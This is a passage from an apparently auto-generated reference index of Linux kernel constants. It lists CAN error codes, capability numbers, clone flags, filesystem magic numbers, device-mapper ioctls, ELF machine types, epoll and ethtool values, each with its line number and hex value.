CAN_ERR_PROT_LOC_RES1 = 0xd constant CAN_ERR_PROT_LOC_RTR (line 627) | CAN_ERR_PROT_LOC_RTR = 0xc constant CAN_ERR_PROT_LOC_SOF (line 628) | CAN_ERR_PROT_LOC_SOF = 0x3 constant CAN_ERR_PROT_LOC_SRTR (line 629) | CAN_ERR_PROT_LOC_SRTR = 0x4 constant CAN_ERR_PROT_LOC_UNSPEC (line 630) | CAN_ERR_PROT_LOC_UNSPEC = 0x0 constant CAN_ERR_PROT_OVERLOAD (line 631) | CAN_ERR_PROT_OVERLOAD = 0x20 constant CAN_ERR_PROT_STUFF (line 632) | CAN_ERR_PROT_STUFF = 0x4 constant CAN_ERR_PROT_TX (line 633) | CAN_ERR_PROT_TX = 0x80 constant CAN_ERR_PROT_UNSPEC (line 634) | CAN_ERR_PROT_UNSPEC = 0x0 constant CAN_ERR_RESTARTED (line 635) | CAN_ERR_RESTARTED = 0x100 constant CAN_ERR_TRX (line 636) | CAN_ERR_TRX = 0x10 constant CAN_ERR_TRX_CANH_NO_WIRE (line 637) | CAN_ERR_TRX_CANH_NO_WIRE = 0x4 constant CAN_ERR_TRX_CANH_SHORT_TO_BAT (line 638) | CAN_ERR_TRX_CANH_SHORT_TO_BAT = 0x5 constant CAN_ERR_TRX_CANH_SHORT_TO_GND (line 639) | CAN_ERR_TRX_CANH_SHORT_TO_GND = 0x7 constant CAN_ERR_TRX_CANH_SHORT_TO_VCC (line 640) | CAN_ERR_TRX_CANH_SHORT_TO_VCC = 0x6 constant CAN_ERR_TRX_CANL_NO_WIRE (line 641) | CAN_ERR_TRX_CANL_NO_WIRE = 0x40 constant CAN_ERR_TRX_CANL_SHORT_TO_BAT (line 642) | CAN_ERR_TRX_CANL_SHORT_TO_BAT = 0x50 constant CAN_ERR_TRX_CANL_SHORT_TO_CANH (line 643) | CAN_ERR_TRX_CANL_SHORT_TO_CANH = 0x80 constant CAN_ERR_TRX_CANL_SHORT_TO_GND (line 644) | CAN_ERR_TRX_CANL_SHORT_TO_GND = 0x70 constant CAN_ERR_TRX_CANL_SHORT_TO_VCC (line 645) | CAN_ERR_TRX_CANL_SHORT_TO_VCC = 0x60 constant CAN_ERR_TRX_UNSPEC (line 646) | CAN_ERR_TRX_UNSPEC = 0x0 constant CAN_ERR_TX_TIMEOUT (line 647) | CAN_ERR_TX_TIMEOUT = 0x1 constant CAN_INV_FILTER (line 648) | CAN_INV_FILTER = 0x20000000 constant CAN_ISOTP (line 649) | CAN_ISOTP = 0x6 constant CAN_J1939 (line 650) | CAN_J1939 = 0x7 constant CAN_MAX_DLC (line 651) | CAN_MAX_DLC = 0x8 constant CAN_MAX_DLEN (line 652) | CAN_MAX_DLEN = 0x8 constant CAN_MAX_RAW_DLC (line 653) | CAN_MAX_RAW_DLC = 0xf constant CAN_MCNET (line 654) | CAN_MCNET = 0x5 constant CAN_MTU (line 655) | CAN_MTU = 0x10 constant CAN_NPROTO (line 656) | CAN_NPROTO = 0x8 constant CAN_RAW (line 657) | CAN_RAW = 0x1 constant CAN_RAW_FILTER_MAX (line 658) | CAN_RAW_FILTER_MAX = 0x200 constant CAN_RTR_FLAG (line 659) | CAN_RTR_FLAG = 0x40000000 constant CAN_SFF_ID_BITS (line 660) | CAN_SFF_ID_BITS = 0xb constant CAN_SFF_MASK (line 661) | CAN_SFF_MASK = 0x7ff constant CAN_TERMINATION_DISABLED (line 662) | CAN_TERMINATION_DISABLED = 0x0 constant CAN_TP16 (line 663) | CAN_TP16 = 0x3 constant CAN_TP20 (line 664) | CAN_TP20 = 0x4 constant CAP_AUDIT_CONTROL (line 665) | CAP_AUDIT_CONTROL = 0x1e constant CAP_AUDIT_READ (line 666) | CAP_AUDIT_READ = 0x25 constant CAP_AUDIT_WRITE (line 667) | CAP_AUDIT_WRITE = 0x1d constant CAP_BLOCK_SUSPEND (line 668) | CAP_BLOCK_SUSPEND = 0x24 constant CAP_BPF (line 669) | CAP_BPF = 0x27 constant CAP_CHECKPOINT_RESTORE (line 670) | CAP_CHECKPOINT_RESTORE = 0x28 constant CAP_CHOWN (line 671) | CAP_CHOWN = 0x0 constant CAP_DAC_OVERRIDE (line 672) | CAP_DAC_OVERRIDE = 0x1 constant CAP_DAC_READ_SEARCH (line 673) | CAP_DAC_READ_SEARCH = 0x2 constant CAP_FOWNER (line 674) | CAP_FOWNER = 0x3 constant CAP_FSETID (line 675) | CAP_FSETID = 0x4 constant CAP_IPC_LOCK (line 676) | CAP_IPC_LOCK = 0xe constant CAP_IPC_OWNER (line 677) | CAP_IPC_OWNER = 0xf constant CAP_KILL (line 678) | CAP_KILL = 0x5 constant CAP_LAST_CAP (line 679) | CAP_LAST_CAP = 0x28 constant CAP_LEASE (line 680) | CAP_LEASE = 0x1c constant CAP_LINUX_IMMUTABLE (line 681) | CAP_LINUX_IMMUTABLE = 0x9 constant CAP_MAC_ADMIN (line 682) | CAP_MAC_ADMIN = 0x21 constant CAP_MAC_OVERRIDE (line 683) | CAP_MAC_OVERRIDE = 0x20 constant CAP_MKNOD (line 684) | CAP_MKNOD = 0x1b constant CAP_NET_ADMIN (line 685) | CAP_NET_ADMIN = 0xc constant CAP_NET_BIND_SERVICE (line 686) | CAP_NET_BIND_SERVICE = 0xa constant CAP_NET_BROADCAST (line 687) | CAP_NET_BROADCAST = 0xb constant CAP_NET_RAW (line 688) | CAP_NET_RAW = 0xd constant CAP_PERFMON (line 689) | CAP_PERFMON = 0x26 constant CAP_SETFCAP (line 690) | CAP_SETFCAP = 0x1f constant CAP_SETGID (line 691) | CAP_SETGID = 0x6 constant CAP_SETPCAP (line 692) | CAP_SETPCAP = 0x8 constant CAP_SETUID (line 693) | CAP_SETUID = 0x7 constant CAP_SYSLOG (line 694) | CAP_SYSLOG = 0x22 constant CAP_SYS_ADMIN (line 695) | CAP_SYS_ADMIN = 0x15 constant CAP_SYS_BOOT (line 696) | CAP_SYS_BOOT = 0x16 constant CAP_SYS_CHROOT (line 697) | CAP_SYS_CHROOT = 0x12 constant CAP_SYS_MODULE (line 698) | CAP_SYS_MODULE = 0x10 constant CAP_SYS_NICE (line 699) | CAP_SYS_NICE = 0x17 constant CAP_SYS_PACCT (line 700) | CAP_SYS_PACCT = 0x14 constant CAP_SYS_PTRACE (line 701) | CAP_SYS_PTRACE = 0x13 constant CAP_SYS_RAWIO (line 702) | CAP_SYS_RAWIO = 0x11 constant CAP_SYS_RESOURCE (line 703) | CAP_SYS_RESOURCE = 0x18 constant CAP_SYS_TIME (line 704) | CAP_SYS_TIME = 0x19 constant CAP_SYS_TTY_CONFIG (line 705) | CAP_SYS_TTY_CONFIG = 0x1a constant CAP_WAKE_ALARM (line 706) | CAP_WAKE_ALARM = 0x23 constant CEPH_SUPER_MAGIC (line 707) | CEPH_SUPER_MAGIC = 0xc36400 constant CFLUSH (line 708) | CFLUSH = 0xf constant CGROUP2_SUPER_MAGIC (line 709) | CGROUP2_SUPER_MAGIC = 0x63677270 constant CGROUP_SUPER_MAGIC (line 710) | CGROUP_SUPER_MAGIC = 0x27e0eb constant CIFS_SUPER_MAGIC (line 711) | CIFS_SUPER_MAGIC = 0xff534d42 constant CLOCK_BOOTTIME (line 712) | CLOCK_BOOTTIME = 0x7 constant CLOCK_BOOTTIME_ALARM (line 713) | CLOCK_BOOTTIME_ALARM = 0x9 constant CLOCK_DEFAULT (line 714) | CLOCK_DEFAULT = 0x0 constant CLOCK_EXT (line 715) | CLOCK_EXT = 0x1 constant CLOCK_INT (line 716) | CLOCK_INT = 0x2 constant CLOCK_MONOTONIC (line 717) | CLOCK_MONOTONIC = 0x1 constant CLOCK_MONOTONIC_COARSE (line 718) | CLOCK_MONOTONIC_COARSE = 0x6 constant CLOCK_MONOTONIC_RAW (line 719) | CLOCK_MONOTONIC_RAW = 0x4 constant CLOCK_PROCESS_CPUTIME_ID (line 720) | CLOCK_PROCESS_CPUTIME_ID = 0x2 constant CLOCK_REALTIME (line 721) | CLOCK_REALTIME = 0x0 constant CLOCK_REALTIME_ALARM (line 722) | CLOCK_REALTIME_ALARM = 0x8 constant CLOCK_REALTIME_COARSE (line 723) | CLOCK_REALTIME_COARSE = 0x5 constant CLOCK_TAI (line 724) | CLOCK_TAI = 0xb constant CLOCK_THREAD_CPUTIME_ID (line 725) | CLOCK_THREAD_CPUTIME_ID = 0x3 constant CLOCK_TXFROMRX (line 726) | CLOCK_TXFROMRX = 0x4 constant CLOCK_TXINT (line 727) | CLOCK_TXINT = 0x3 constant CLONE_ARGS_SIZE_VER0 (line 728) | CLONE_ARGS_SIZE_VER0 = 0x40 constant CLONE_ARGS_SIZE_VER1 (line 729) | CLONE_ARGS_SIZE_VER1 = 0x50 constant CLONE_ARGS_SIZE_VER2 (line 730) | CLONE_ARGS_SIZE_VER2 = 0x58 constant CLONE_CHILD_CLEARTID (line 731) | CLONE_CHILD_CLEARTID = 0x200000 constant CLONE_CHILD_SETTID (line 732) | CLONE_CHILD_SETTID = 0x1000000 constant CLONE_CLEAR_SIGHAND (line 733) | CLONE_CLEAR_SIGHAND = 0x100000000 constant CLONE_DETACHED (line 734) | CLONE_DETACHED = 0x400000 constant CLONE_FILES (line 735) | CLONE_FILES = 0x400 constant CLONE_FS (line 736) | CLONE_FS = 0x200 constant CLONE_INTO_CGROUP (line 737) | CLONE_INTO_CGROUP = 0x200000000 constant CLONE_IO (line 738) | CLONE_IO = 0x80000000 constant CLONE_NEWCGROUP (line 739) | CLONE_NEWCGROUP = 0x2000000 constant CLONE_NEWIPC (line 740) | CLONE_NEWIPC = 0x8000000 constant CLONE_NEWNET (line 741) | CLONE_NEWNET = 0x40000000 constant CLONE_NEWNS (line 742) | CLONE_NEWNS = 0x20000 constant CLONE_NEWPID (line 743) | CLONE_NEWPID = 0x20000000 constant CLONE_NEWTIME (line 744) | CLONE_NEWTIME = 0x80 constant CLONE_NEWUSER (line 745) | CLONE_NEWUSER = 0x10000000 constant CLONE_NEWUTS (line 746) | CLONE_NEWUTS = 0x4000000 constant CLONE_PARENT (line 747) | CLONE_PARENT = 0x8000 constant CLONE_PARENT_SETTID (line 748) | CLONE_PARENT_SETTID = 0x100000 constant CLONE_PIDFD (line 749) | CLONE_PIDFD = 0x1000 constant CLONE_PTRACE (line 750) | CLONE_PTRACE = 0x2000 constant CLONE_SETTLS (line 751) | CLONE_SETTLS = 0x80000 constant CLONE_SIGHAND (line 752) | CLONE_SIGHAND = 0x800 constant CLONE_SYSVSEM (line 753) | CLONE_SYSVSEM = 0x40000 constant CLONE_THREAD (line 754) | CLONE_THREAD = 0x10000 constant CLONE_UNTRACED (line 755) | CLONE_UNTRACED = 0x800000 constant CLONE_VFORK (line 756) | CLONE_VFORK = 0x4000 constant CLONE_VM (line 757) | CLONE_VM = 0x100 constant CMSPAR (line 758) | CMSPAR = 0x40000000 constant CODA_SUPER_MAGIC (line 759) | CODA_SUPER_MAGIC = 0x73757245 constant CR0 (line 760) | CR0 = 0x0 constant CRAMFS_MAGIC (line 761) | CRAMFS_MAGIC = 0x28cd3d45 constant CRTSCTS (line 762) | CRTSCTS = 0x80000000 constant CRYPTO_MAX_NAME (line 763) | CRYPTO_MAX_NAME = 0x40 constant CRYPTO_MSG_MAX (line 764) | CRYPTO_MSG_MAX = 0x15 constant CRYPTO_NR_MSGTYPES (line 765) | CRYPTO_NR_MSGTYPES = 0x6 constant CRYPTO_REPORT_MAXSIZE (line 766) | CRYPTO_REPORT_MAXSIZE = 0x160 constant CS5 (line 767) | CS5 = 0x0 constant CSIGNAL (line 768) | CSIGNAL = 0xff constant CSTART (line 769) | CSTART = 0x11 constant CSTATUS (line 770) | CSTATUS = 0x0 constant CSTOP (line 771) | CSTOP = 0x13 constant CSUSP (line 772) | CSUSP = 0x1a constant DAXFS_MAGIC (line 773) | DAXFS_MAGIC = 0x64646178 constant DEBUGFS_MAGIC (line 774) | DEBUGFS_MAGIC = 0x64626720 constant DEVLINK_CMD_ESWITCH_MODE_GET (line 775) | DEVLINK_CMD_ESWITCH_MODE_GET = 0x1d constant DEVLINK_CMD_ESWITCH_MODE_SET (line 776) | DEVLINK_CMD_ESWITCH_MODE_SET = 0x1e constant DEVLINK_FLASH_OVERWRITE_IDENTIFIERS (line 777) | DEVLINK_FLASH_OVERWRITE_IDENTIFIERS = 0x2 constant DEVLINK_FLASH_OVERWRITE_SETTINGS (line 778) | DEVLINK_FLASH_OVERWRITE_SETTINGS = 0x1 constant DEVLINK_GENL_MCGRP_CONFIG_NAME (line 779) | DEVLINK_GENL_MCGRP_CONFIG_NAME = "config" constant DEVLINK_GENL_NAME (line 780) | DEVLINK_GENL_NAME = "devlink" constant DEVLINK_GENL_VERSION (line 781) | DEVLINK_GENL_VERSION = 0x1 constant DEVLINK_PORT_FN_CAP_IPSEC_CRYPTO (line 782) | DEVLINK_PORT_FN_CAP_IPSEC_CRYPTO = 0x4 constant DEVLINK_PORT_FN_CAP_IPSEC_PACKET (line 783) | DEVLINK_PORT_FN_CAP_IPSEC_PACKET = 0x8 constant DEVLINK_PORT_FN_CAP_MIGRATABLE (line 784) | DEVLINK_PORT_FN_CAP_MIGRATABLE = 0x2 constant DEVLINK_PORT_FN_CAP_ROCE (line 785) | DEVLINK_PORT_FN_CAP_ROCE = 0x1 constant DEVLINK_SB_THRESHOLD_TO_ALPHA_MAX (line 786) | DEVLINK_SB_THRESHOLD_TO_ALPHA_MAX = 0x14 constant DEVLINK_SUPPORTED_FLASH_OVERWRITE_SECTIONS (line 787) | DEVLINK_SUPPORTED_FLASH_OVERWRITE_SECTIONS = 0x3 constant DEVMEM_MAGIC (line 788) | DEVMEM_MAGIC = 0x454d444d constant DEVPTS_SUPER_MAGIC (line 789) | DEVPTS_SUPER_MAGIC = 0x1cd1 constant DMA_BUF_MAGIC (line 790) | DMA_BUF_MAGIC = 0x444d4142 constant DM_ACTIVE_PRESENT_FLAG (line 791) | DM_ACTIVE_PRESENT_FLAG = 0x20 constant DM_BUFFER_FULL_FLAG (line 792) | DM_BUFFER_FULL_FLAG = 0x100 constant DM_CONTROL_NODE (line 793) | DM_CONTROL_NODE = "control" constant DM_DATA_OUT_FLAG (line 794) | DM_DATA_OUT_FLAG = 0x10000 constant DM_DEFERRED_REMOVE (line 795) | DM_DEFERRED_REMOVE = 0x20000 constant DM_DEV_ARM_POLL (line 796) | DM_DEV_ARM_POLL = 0xc138fd10 constant DM_DEV_CREATE (line 797) | DM_DEV_CREATE = 0xc138fd03 constant DM_DEV_REMOVE (line 798) | DM_DEV_REMOVE = 0xc138fd04 constant DM_DEV_RENAME (line 799) | DM_DEV_RENAME = 0xc138fd05 constant DM_DEV_SET_GEOMETRY (line 800) | DM_DEV_SET_GEOMETRY = 0xc138fd0f constant DM_DEV_STATUS (line 801) | DM_DEV_STATUS = 0xc138fd07 constant DM_DEV_SUSPEND (line 802) | DM_DEV_SUSPEND = 0xc138fd06 constant DM_DEV_WAIT (line 803) | DM_DEV_WAIT = 0xc138fd08 constant DM_DIR (line 804) | DM_DIR = "mapper" constant DM_GET_TARGET_VERSION (line 805) | DM_GET_TARGET_VERSION = 0xc138fd11 constant DM_IMA_MEASUREMENT_FLAG (line 806) | DM_IMA_MEASUREMENT_FLAG = 0x80000 constant DM_INACTIVE_PRESENT_FLAG (line 807) | DM_INACTIVE_PRESENT_FLAG = 0x40 constant DM_INTERNAL_SUSPEND_FLAG (line 808) | DM_INTERNAL_SUSPEND_FLAG = 0x40000 constant DM_IOCTL (line 809) | DM_IOCTL = 0xfd constant DM_LIST_DEVICES (line 810) | DM_LIST_DEVICES = 0xc138fd02 constant DM_LIST_VERSIONS (line 811) | DM_LIST_VERSIONS = 0xc138fd0d constant DM_MAX_TYPE_NAME (line 812) | DM_MAX_TYPE_NAME = 0x10 constant DM_NAME_LEN (line 813) | DM_NAME_LEN = 0x80 constant DM_NAME_LIST_FLAG_DOESNT_HAVE_UUID (line 814) | DM_NAME_LIST_FLAG_DOESNT_HAVE_UUID = 0x2 constant DM_NAME_LIST_FLAG_HAS_UUID (line 815) | DM_NAME_LIST_FLAG_HAS_UUID = 0x1 constant DM_NOFLUSH_FLAG (line 816) | DM_NOFLUSH_FLAG = 0x800 constant DM_PERSISTENT_DEV_FLAG (line 817) | DM_PERSISTENT_DEV_FLAG = 0x8 constant DM_QUERY_INACTIVE_TABLE_FLAG (line 818) | DM_QUERY_INACTIVE_TABLE_FLAG = 0x1000 constant DM_READONLY_FLAG (line 819) | DM_READONLY_FLAG = 0x1 constant DM_REMOVE_ALL (line 820) | DM_REMOVE_ALL = 0xc138fd01 constant DM_SECURE_DATA_FLAG (line 821) | DM_SECURE_DATA_FLAG = 0x8000 constant DM_SKIP_BDGET_FLAG (line 822) | DM_SKIP_BDGET_FLAG = 0x200 constant DM_SKIP_LOCKFS_FLAG (line 823) | DM_SKIP_LOCKFS_FLAG = 0x400 constant DM_STATUS_TABLE_FLAG (line 824) | DM_STATUS_TABLE_FLAG = 0x10 constant DM_SUSPEND_FLAG (line 825) | DM_SUSPEND_FLAG = 0x2 constant DM_TABLE_CLEAR (line 826) | DM_TABLE_CLEAR = 0xc138fd0a constant DM_TABLE_DEPS (line 827) | DM_TABLE_DEPS = 0xc138fd0b constant DM_TABLE_LOAD (line 828) | DM_TABLE_LOAD = 0xc138fd09 constant DM_TABLE_STATUS (line 829) | DM_TABLE_STATUS = 0xc138fd0c constant DM_TARGET_MSG (line 830) | DM_TARGET_MSG = 0xc138fd0e constant DM_UEVENT_GENERATED_FLAG (line 831) | DM_UEVENT_GENERATED_FLAG = 0x2000 constant DM_UUID_FLAG (line 832) | DM_UUID_FLAG = 0x4000 constant DM_UUID_LEN (line 833) | DM_UUID_LEN = 0x81 constant DM_VERSION (line 834) | DM_VERSION = 0xc138fd00 constant DM_VERSION_EXTRA (line 835) | DM_VERSION_EXTRA = "-ioctl (2023-03-01)" constant DM_VERSION_MAJOR (line 836) | DM_VERSION_MAJOR = 0x4 constant DM_VERSION_MINOR (line 837) | DM_VERSION_MINOR = 0x30 constant DM_VERSION_PATCHLEVEL (line 838) | DM_VERSION_PATCHLEVEL = 0x0 constant DT_BLK (line 839) | DT_BLK = 0x6 constant DT_CHR (line 840) | DT_CHR = 0x2 constant DT_DIR (line 841) | DT_DIR = 0x4 constant DT_FIFO (line 842) | DT_FIFO = 0x1 constant DT_LNK (line 843) | DT_LNK = 0xa constant DT_REG (line 844) | DT_REG = 0x8 constant DT_SOCK (line 845) | DT_SOCK = 0xc constant DT_UNKNOWN (line 846) | DT_UNKNOWN = 0x0 constant DT_WHT (line 847) | DT_WHT = 0xe constant ECHO (line 848) | ECHO = 0x8 constant ECRYPTFS_SUPER_MAGIC (line 849) | ECRYPTFS_SUPER_MAGIC = 0xf15f constant EFD_SEMAPHORE (line 850) | EFD_SEMAPHORE = 0x1 constant EFIVARFS_MAGIC (line 851) | EFIVARFS_MAGIC = 0xde5e81e4 constant EFS_SUPER_MAGIC (line 852) | EFS_SUPER_MAGIC = 0x414a53 constant EM_386 (line 853) | EM_386 = 0x3 constant EM_486 (line 854) | EM_486 = 0x6 constant EM_68K (line 855) | EM_68K = 0x4 constant EM_860 (line 856) | EM_860 = 0x7 constant EM_88K (line 857) | EM_88K = 0x5 constant EM_AARCH64 (line 858) | EM_AARCH64 = 0xb7 constant EM_ALPHA (line 859) | EM_ALPHA = 0x9026 constant EM_ALTERA_NIOS2 (line 860) | EM_ALTERA_NIOS2 = 0x71 constant EM_ARCOMPACT (line 861) | EM_ARCOMPACT = 0x5d constant EM_ARCV2 (line 862) | EM_ARCV2 = 0xc3 constant EM_ARM (line 863) | EM_ARM = 0x28 constant EM_BLACKFIN (line 864) | EM_BLACKFIN = 0x6a constant EM_BPF (line 865) | EM_BPF = 0xf7 constant EM_CRIS (line 866) | EM_CRIS = 0x4c constant EM_CSKY (line 867) | EM_CSKY = 0xfc constant EM_CYGNUS_M32R (line 868) | EM_CYGNUS_M32R = 0x9041 constant EM_CYGNUS_MN10300 (line 869) | EM_CYGNUS_MN10300 = 0xbeef constant EM_FRV (line 870) | EM_FRV = 0x5441 constant EM_H8_300 (line 871) | EM_H8_300 = 0x2e constant EM_HEXAGON (line 872) | EM_HEXAGON = 0xa4 constant EM_IA_64 (line 873) | EM_IA_64 = 0x32 constant EM_LOONGARCH (line 874) | EM_LOONGARCH = 0x102 constant EM_M32 (line 875) | EM_M32 = 0x1 constant EM_M32R (line 876) | EM_M32R = 0x58 constant EM_MICROBLAZE (line 877) | EM_MICROBLAZE = 0xbd constant EM_MIPS (line 878) | EM_MIPS = 0x8 constant EM_MIPS_RS3_LE (line 879) | EM_MIPS_RS3_LE = 0xa constant EM_MIPS_RS4_BE (line 880) | EM_MIPS_RS4_BE = 0xa constant EM_MN10300 (line 881) | EM_MN10300 = 0x59 constant EM_NDS32 (line 882) | EM_NDS32 = 0xa7 constant EM_NONE (line 883) | EM_NONE = 0x0 constant EM_OPENRISC (line 884) | EM_OPENRISC = 0x5c constant EM_PARISC (line 885) | EM_PARISC = 0xf constant EM_PPC (line 886) | EM_PPC = 0x14 constant EM_PPC64 (line 887) | EM_PPC64 = 0x15 constant EM_RISCV (line 888) | EM_RISCV = 0xf3 constant EM_S390 (line 889) | EM_S390 = 0x16 constant EM_S390_OLD (line 890) | EM_S390_OLD = 0xa390 constant EM_SH (line 891) | EM_SH = 0x2a constant EM_SPARC (line 892) | EM_SPARC = 0x2 constant EM_SPARC32PLUS (line 893) | EM_SPARC32PLUS = 0x12 constant EM_SPARCV9 (line 894) | EM_SPARCV9 = 0x2b constant EM_SPU (line 895) | EM_SPU = 0x17 constant EM_TILEGX (line 896) | EM_TILEGX = 0xbf constant EM_TILEPRO (line 897) | EM_TILEPRO = 0xbc constant EM_TI_C6000 (line 898) | EM_TI_C6000 = 0x8c constant EM_UNICORE (line 899) | EM_UNICORE = 0x6e constant EM_X86_64 (line 900) | EM_X86_64 = 0x3e constant EM_XTENSA (line 901) | EM_XTENSA = 0x5e constant ENCODING_DEFAULT (line 902) | ENCODING_DEFAULT = 0x0 constant ENCODING_FM_MARK (line 903) | ENCODING_FM_MARK = 0x3 constant ENCODING_FM_SPACE (line 904) | ENCODING_FM_SPACE = 0x4 constant ENCODING_MANCHESTER (line 905) | ENCODING_MANCHESTER = 0x5 constant ENCODING_NRZ (line 906) | ENCODING_NRZ = 0x1 constant ENCODING_NRZI (line 907) | ENCODING_NRZI = 0x2 constant EPOLLERR (line 908) | EPOLLERR = 0x8 constant EPOLLET (line 909) | EPOLLET = 0x80000000 constant EPOLLEXCLUSIVE (line 910) | EPOLLEXCLUSIVE = 0x10000000 constant EPOLLHUP (line 911) | EPOLLHUP = 0x10 constant EPOLLIN (line 912) | EPOLLIN = 0x1 constant EPOLLMSG (line 913) | EPOLLMSG = 0x400 constant EPOLLONESHOT (line 914) | EPOLLONESHOT = 0x40000000 constant EPOLLOUT (line 915) | EPOLLOUT = 0x4 constant EPOLLPRI (line 916) | EPOLLPRI = 0x2 constant EPOLLRDBAND (line 917) | EPOLLRDBAND = 0x80 constant EPOLLRDHUP (line 918) | EPOLLRDHUP = 0x2000 constant EPOLLRDNORM (line 919) | EPOLLRDNORM = 0x40 constant EPOLLWAKEUP (line 920) | EPOLLWAKEUP = 0x20000000 constant EPOLLWRBAND (line 921) | EPOLLWRBAND = 0x200 constant EPOLLWRNORM (line 922) | EPOLLWRNORM = 0x100 constant EPOLL_CTL_ADD (line 923) | EPOLL_CTL_ADD = 0x1 constant EPOLL_CTL_DEL (line 924) | EPOLL_CTL_DEL = 0x2 constant EPOLL_CTL_MOD (line 925) | EPOLL_CTL_MOD = 0x3 constant EROFS_SUPER_MAGIC_V1 (line 926) | EROFS_SUPER_MAGIC_V1 = 0xe0f5e1e2 constant ESP_V4_FLOW (line 927) | ESP_V4_FLOW = 0xa constant ESP_V6_FLOW (line 928) | ESP_V6_FLOW = 0xc constant ETHER_FLOW (line 929) | ETHER_FLOW = 0x12 constant ETHTOOL_BUSINFO_LEN (line 930) | ETHTOOL_BUSINFO_LEN = 0x20 constant ETHTOOL_EROMVERS_LEN (line 931) | ETHTOOL_EROMVERS_LEN = 0x20 constant ETHTOOL_FEC_AUTO (line 932) | ETHTOOL_FEC_AUTO = 0x2 constant ETHTOOL_FEC_BASER (line 933) | ETHTOOL_FEC_BASER = 0x10 constant ETHTOOL_FEC_LLRS (line 934) | ETHTOOL_FEC_LLRS = 0x20 constant ETHTOOL_FEC_NONE (line 935) | ETHTOOL_FEC_NONE = 0x1 constant ETHTOOL_FEC_OFF (line 936) | ETHTOOL_FEC_OFF = 0x4 constant ETHTOOL_FEC_RS (line 937) | ETHTOOL_FEC_RS = 0x8 constant ETHTOOL_FLAG_ALL (line 938) | ETHTOOL_FLAG_ALL = 0x7 constant ETHTOOL_FLAG_COMPACT_BITSETS (line 939) | ETHTOOL_FLAG_COMPACT_BITSETS = 0x1 constant ETHTOOL_FLAG_OMIT_REPLY (line 940) | ETHTOOL_FLAG_OMIT_REPLY = 0x2 constant ETHTOOL_FLAG_STATS (line 941) | ETHTOOL_FLAG_STATS = 0x4 constant ETHTOOL_FLASHDEV (line 942) | ETHTOOL_FLASHDEV = 0x33 constant ETHTOOL_FLASH_MAX_FILENAME (line 943) | ETHTOOL_FLASH_MAX_FILENAME = 0x80 constant ETHTOOL_FWVERS_LEN (line 944) | ETHTOOL_FWVERS_LEN = 0x20 constant ETHTOOL_F_COMPAT (line 945) | ETHTOOL_F_COMPAT = 0x4 constant ETHTOOL_F_UNSUPPORTED (line 946) | ETHTOOL_F_UNSUPPORTED = 0x1 constant ETHTOOL_F_WISH (line 947) | ETHTOOL_F_WISH = 0x2 constant ETHTOOL_GCHANNELS (line 948) | ETHTOOL_GCHANNELS = 0x3c constant ETHTOOL_GCOALESCE (line 949) | ETHTOOL_GCOALESCE = 0xe constant ETHTOOL_GDRVINFO (line 950) | ETHTOOL_GDRVINFO = 0x3 constant ETHTOOL_GEEE (line 951) | ETHTOOL_GEEE = 0x44 constant ETHTOOL_GEEPROM (line 952) | ETHTOOL_GEEPROM = 0xb constant ETHTOOL_GENL_NAME (line 953) | ETHTOOL_GENL_NAME = "ethtool" constant ETHTOOL_GENL_VERSION (line 954) | ETHTOOL_GENL_VERSION = 0x1 constant ETHTOOL_GET_DUMP_DATA (line 955) | ETHTOOL_GET_DUMP_DATA = 0x40 constant ETHTOOL_GET_DUMP_FLAG (line 956) | ETHTOOL_GET_DUMP_FLAG = 0x3f constant ETHTOOL_GET_TS_INFO (line 957) | ETHTOOL_GET_TS_INFO = 0x41 constant ETHTOOL_GFEATURES (line 958) | ETHTOOL_GFEATURES = 0x3a constant ETHTOOL_GFECPARAM (line 959) | ETHTOOL_GFECPARAM = 0x50 constant ETHTOOL_GFLAGS (line 960) | ETHTOOL_GFLAGS = 0x25 constant ETHTOOL_GGRO (line 961) | ETHTOOL_GGRO = 0x2b constant ETHTOOL_GGSO (line 962) | ETHTOOL_GGSO = 0x23 constant ETHTOOL_GLINK (line 963) | ETHTOOL_GLINK = 0xa constant ETHTOOL_GLINKSETTINGS (line 964) | ETHTOOL_GLINKSETTINGS = 0x4c constant ETHTOOL_GMODULEEEPROM (line 965) | ETHTOOL_GMODULEEEPROM = 0x43 constant ETHTOOL_GMODULEINFO (line 966) | ETHTOOL_GMODULEINFO = 0x42 constant ETHTOOL_GMSGLVL (line 967) | ETHTOOL_GMSGLVL = 0x7 constant ETHTOOL_GPAUSEPARAM (line 968) | ETHTOOL_GPAUSEPARAM = 0x12 constant ETHTOOL_GPERMADDR (line 969) | ETHTOOL_GPERMADDR = 0x20 constant ETHTOOL_GPFLAGS (line 970) | ETHTOOL_GPFLAGS = 0x27 constant ETHTOOL_GPHYSTATS (line 971) | ETHTOOL_GPHYSTATS = 0x4a constant ETHTOOL_GREGS (line 972) | ETHTOOL_GREGS = 0x4 constant ETHTOOL_GRINGPARAM (line 973) | ETHTOOL_GRINGPARAM = 0x10 constant ETHTOOL_GRSSH (line 974) | ETHTOOL_GRSSH = 0x46 constant ETHTOOL_GRXCLSRLALL (line 975) | ETHTOOL_GRXCLSRLALL = 0x30 constant ETHTOOL_GRXCLSRLCNT (line 976) | ETHTOOL_GRXCLSRLCNT = 0x2e constant ETHTOOL_GRXCLSRULE (line 977) | ETHTOOL_GRXCLSRULE = 0x2f constant ETHTOOL_GRXCSUM (line 978) | ETHTOOL_GRXCSUM = 0x14 constant ETHTOOL_GRXFH (line 979) | ETHTOOL_GRXFH = 0x29 constant ETHTOOL_GRXFHINDIR (line 980) | ETHTOOL_GRXFHINDIR = 0x38 constant ETHTOOL_GRXNTUPLE (line 981) | ETHTOOL_GRXNTUPLE = 0x36 constant ETHTOOL_GRXRINGS (line 982) | ETHTOOL_GRXRINGS = 0x2d constant ETHTOOL_GSET (line 983) | ETHTOOL_GSET = 0x1 constant ETHTOOL_GSG (line 984) | ETHTOOL_GSG = 0x18 constant ETHTOOL_GSSET_INFO (line 985) | ETHTOOL_GSSET_INFO = 0x37 constant ETHTOOL_GSTATS (line 986) | ETHTOOL_GSTATS = 0x1d constant ETHTOOL_GSTRINGS (line 987) | ETHTOOL_GSTRINGS = 0x1b constant ETHTOOL_GTSO (line 988) | ETHTOOL_GTSO = 0x1e constant ETHTOOL_GTUNABLE (line 989) | ETHTOOL_GTUNABLE = 0x48 constant ETHTOOL_GTXCSUM (line 990) | ETHTOOL_GTXCSUM = 0x16 constant ETHTOOL_GUFO (line 991) | ETHTOOL_GUFO = 0x21 constant ETHTOOL_GWOL (line 992) | ETHTOOL_GWOL = 0x5 constant ETHTOOL_MCGRP_MONITOR_NAME (line 993) | ETHTOOL_MCGRP_MONITOR_NAME = "monitor" constant ETHTOOL_NWAY_RST (line 994) | 